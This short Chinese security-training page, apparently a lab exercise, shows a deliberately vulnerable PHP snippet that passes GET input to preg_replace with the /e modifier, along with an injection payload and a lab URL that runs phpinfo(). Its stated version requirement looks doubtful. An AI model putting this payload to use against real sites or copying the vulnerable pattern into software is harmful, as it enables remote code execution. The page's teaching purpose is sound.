代码执行漏洞一

程序源码如下:
<?php
    $data=$_GET['data'];
    echo $data;
    preg_replace('/(.*)<\/data>/e', '$ret="\\1";',$data);
    echo $ret;
?>
经过测试:
传值 ${phpinfo()} 可以执行,并且php版本要求5.5及以上版本
http://eval.nanhack.com/eval/eval3.php?data=${phpinfo()}

必火安全学院

报名微信:nvhack



© Copyright 2021 版权所有(一极教育科技有限公司)   津公网安备 12011602000477号 津ICP备17008032号-2   网络安全培训、企业合作、院校合作: 15320004362(手机同微信)